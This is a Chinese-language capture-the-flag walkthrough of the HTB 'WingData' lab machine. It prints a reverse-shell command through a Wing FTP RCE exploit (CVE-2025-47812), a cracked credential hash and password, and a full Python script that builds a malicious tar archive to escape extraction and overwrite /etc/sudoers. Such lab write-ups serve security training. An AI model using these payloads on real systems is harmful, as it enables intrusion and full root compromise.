【渗透测试】HTB靶场之WingData 全过程wp

WingData

信息收集

得到一个ftp.wingdata.htb，也将这个加上

Wing FTP Server v7.4.3
通过搜寻cve是 CVE-2025-47812
漏洞利用（CVE-2025-47812）

4m3rr0r/CVE-2025-47812-poc: Wing FTP Server Remote Code Execution (RCE) Exploit (CVE-2025-47812)

1. python CVE-2025-47812.py -u http://ftp.wingdata.htb -c "whoami" -v

复制代码

然后反弹shell

1. python CVE-2025-47812.py -u http://ftp.wingdata.htb -c "nc 10.10.16.5 8888 -e /bin/sh" -v
3. python3 -c 'import pty;pty.spawn("/bin/bash")'

复制代码

然后在/opt/wftpserver/Data/1/users下的wacky.xml获得用户加密凭据

1. 32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP

复制代码

爆破hash(WingFTP 使用SHA256算法，并使用盐值“WingFTP”为加密方式)

1. hashcat -m 1410 hash.txt /usr/share/wordlists/rockyou.txt

复制代码

得到密码!#7Blushing^*Bride5
wacky/c
然后ssh连接

得到user.txt
权限提升

先sudo -l看一下

可以看到有一个py脚本
我们去看一下

1. cat /opt/backup_clients/restore_backup_clients.py

复制代码

1. #!/usr/bin/env python3
2. import tarfile
3. import os
4. import sys
5. import re
6. import argparse
8. BACKUP_BASE_DIR = "/opt/backup_clients/backups"
9. STAGING_BASE = "/opt/backup_clients/restored_backups"
11. def validate_backup_name(filename):
12.     if not re.fullmatch(r"^backup_\d+\.tar$", filename):
13.         return False
14.     client_id = filename.split('_')[1].rstrip('.tar')
15.     return client_id.isdigit() and client_id != "0"
17. def validate_restore_tag(tag):
18.     return bool(re.fullmatch(r"^[a-zA-Z0-9_]{1,24}$", tag))
20. def main():
21.     parser = argparse.ArgumentParser(
22.         description="Restore client configuration from a validated backup tarball.",
23.         epilog="Example: sudo %(prog)s -b backup_1001.tar -r restore_john"
24.     )
25.     parser.add_argument(
26.         "-b", "--backup",
27.         required=True,
28.         help="Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar, "
29.              "where <client_id> is a positive integer, e.g., backup_1001.tar)"
30.     )
31.     parser.add_argument(
32.         "-r", "--restore-dir",
33.         required=True,
34.         help="Staging directory name for the restore operation. "
35.              "Must follow the format: restore_<client_user> (e.g., restore_john). "
36.              "Only alphanumeric characters and underscores are allowed in the <client_user> part (1–24 characters)."
37.     )
39.     args = parser.parse_args()
41.     if not validate_backup_name(args.backup):
42.         print("[!] Invalid backup name. Expected format: backup_<client_id>.tar (e.g., backup_1001.tar)", file=sys.stderr)
43.         sys.exit(1)
45.     backup_path = os.path.join(BACKUP_BASE_DIR, args.backup)
46.     if not os.path.isfile(backup_path):
47.         print(f"[!] Backup file not found: {backup_path}", file=sys.stderr)
48.         sys.exit(1)
50.     if not args.restore_dir.startswith("restore_"):
51.         print("[!] --restore-dir must start with 'restore_'", file=sys.stderr)
52.         sys.exit(1)
54.     tag = args.restore_dir[8:]
55.     if not tag:
56.         print("[!] --restore-dir must include a non-empty tag after 'restore_'", file=sys.stderr)
57.         sys.exit(1)
59.     if not validate_restore_tag(tag):
60.         print("[!] Restore tag must be 1–24 characters long and contain only letters, digits, or underscores", file=sys.stderr)
61.         sys.exit(1)
63.     staging_dir = os.path.join(STAGING_BASE, args.restore_dir)
64.     print(f"[+] Backup: {args.backup}")
65.     print(f"[+] Staging directory: {staging_dir}")
67.     os.makedirs(staging_dir, exist_ok=True)
69.     try:
70.         with tarfile.open(backup_path, "r") as tar:
71.             tar.extractall(path=staging_dir, filter="data")
72.         print(f"[+] Extraction completed in {staging_dir}")
73.     except (tarfile.TarError, OSError, Exception) as e:
74.         print(f"[!] Error during extraction: {e}", file=sys.stderr)
75.         sys.exit(2)
77. if __name__ == "__main__":
78.     main()

复制代码

我们利用这个脚本生成tar文件

1. #!/usr/bin/env python3
2. # -*- coding: utf-8 -*-
3. """
4. 生成恶意tar文件的漏洞利用脚本
5. 作用：构造包含多层目录、符号链接的tar文件，尝试突破路径限制写入/etc/sudoers
6. """
8. import tarfile
9. import os
10. import io
11. import sys
13. def create_malicious_tar(output_path="/tmp/backup_9999.tar"):
14.     """
15.     创建恶意tar文件，包含路径遍历和符号链接的构造
16.    
17.     Args:
18.         output_path: 生成的tar文件保存路径，默认/tmp/backup_9999.tar
19.     """
20.     # 构造长目录名（247个d），用于突破路径长度限制
21.     long_dir_name = 'd' * 247
22.     # 用于构造多层目录的字符序列
23.     step_chars = "abcdefghijklmnop"
24.     current_path = ""
26.     try:
27.         # 以写模式打开tar文件
28.         with tarfile.open(output_path, mode="w") as tar:
29.             # 循环构造多层目录和符号链接
30.             for char in step_chars:
31.                 # 1. 创建长目录名的目录项
32.                 dir_info = tarfile.TarInfo(os.path.join(current_path, long_dir_name))
33.                 dir_info.type = tarfile.DIRTYPE  # 标记为目录类型
34.                 tar.addfile(dir_info)
36.                 # 2. 创建指向该长目录的符号链接
37.                 symlink_info = tarfile.TarInfo(os.path.join(current_path, char))
38.                 symlink_info.type = tarfile.SYMTYPE  # 标记为符号链接类型
39.                 symlink_info.linkname = long_dir_name  # 链接指向长目录
40.                 tar.addfile(symlink_info)
42.                 # 更新当前路径，进入下一层
43.                 current_path = os.path.join(current_path, long_dir_name)
45.             # 3. 构造多层符号链接路径，用于路径遍历
46.             link_path = os.path.join("/".join(step_chars), "l"*254)
47.             link_info = tarfile.TarInfo(link_path)
48.             link_info.type = tarfile.SYMTYPE
49.             link_info.linkname = "../" * len(step_chars)  # 构造回退路径
50.             tar.addfile(link_info)
52.             # 4. 创建指向/etc目录的符号链接（escape）
53.             escape_info = tarfile.TarInfo("escape")
54.             escape_info.type = tarfile.SYMTYPE
55.             escape_info.linkname = f"{link_path}/../../../../../../../etc"
56.             tar.addfile(escape_info)
58.             # 5. 创建指向/etc/sudoers的硬链接（sudoers_link）
59.             sudoers_link_info = tarfile.TarInfo("sudoers_link")
60.             sudoers_link_info.type = tarfile.LNKTYPE
61.             sudoers_link_info.linkname = "escape/sudoers"
62.             tar.addfile(sudoers_link_info)
64.             # 6. 写入恶意内容到sudoers_link（覆盖/etc/sudoers）
65.             malicious_content = b"wacky ALL=(ALL) NOPASSWD: ALL\n"
66.             file_info = tarfile.TarInfo("sudoers_link")
67.             file_info.type = tarfile.REGTYPE  # 标记为普通文件类型
68.             file_info.size = len(malicious_content)  # 指定文件大小
69.             # 将内容写入tar文件
70.             tar.addfile(file_info, fileobj=io.BytesIO(malicious_content))
72.         print(f"[+] 恶意tar文件已生成：{output_path}")
73.     except Exception as e:
74.         print(f"[!] 生成tar文件失败：{str(e)}", file=sys.stderr)
75.         sys.exit(1)
77. if __name__ == "__main__":
78.     # 支持自定义输出路径（可选参数）
79.     if len(sys.argv) > 1:
80.         output_tar = sys.argv[1]
81.     else:
82.         output_tar = "/tmp/backup_9999.tar"
83.    
84.     create_malicious_tar(output_tar)

复制代码

复制这个恶意的tar文件到sudo权限的目录下

1. cp backup_9999.tar /opt/backup_clients/backups/

复制代码

然后运行这个sudo脚本

1. sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_9999.tar -r restore_evil

复制代码

这时候再去sudo

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！